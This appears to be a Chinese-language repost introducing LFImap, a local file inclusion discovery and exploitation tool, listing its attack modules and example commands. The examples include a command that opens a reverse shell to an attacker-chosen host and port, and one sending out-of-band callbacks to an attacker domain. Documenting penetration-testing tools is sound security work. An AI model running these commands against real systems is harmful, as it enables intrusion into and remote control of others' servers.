工具简介
LFImap是一款本地文件包含发现和利用工具,该项目处于预alpha阶段。主要版本1.0即将推出,其中包含大量新功能和模块。
使用不同模块进行攻击:
过滤包装文件包含
数据包装器远程命令执行
输入包装器远程命令执行
期望包装器远程命令执行
文件包装器文件包含
路径遍历攻击
远程文件包含
自定义多语言命令注入
启发式扫描
自定义多语言XSS、CRLF检查
打开重定向检查
基于错误的文件包含信息泄漏
测试模式:
-U -> 指定要测试的单个URL
-F -> 指定要测试的URL单词表
-R -> 指定要测试的文件中原始http
完全控制HTTP请求
测试参数的规范(GET、FORM-line、Header、自定义注入点)
自定义HTTP标头的规范
能够使用任意格式行(POST)数据进行测试
能够使用任意HTTP方法进行测试
能够通过Web代理转移请求
能够将所有请求和响应记录到文件中
能够通过请求之间的超时和最大响应时间调整测试
支持通过url和base64编码操作有效载荷
快速模式(-q),其中LFImap使用较少的精心挑选的有效载荷
二阶(存储)漏洞检查支持
Beta/测试阶段CSRF处理支持
python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a
2)使用‘-D’进行参数后测试
python3 lfimap.py -U "http://IP/index.php" -D "page=testme" -a
3)使用‘-x’进行反向 shell 远程命令执行攻击
python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a -x --lhost <IP> --lport <PORT>
4)使用“--callback”实现带外盲漏洞详细测试支持
python3 lfimap.py -U "http://IP/index.php?param=testme" -a -v --callback="attacker.oastify.com"
下载地址
原文始发于微信公众号(黑白之道):本地文件包含发现和利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论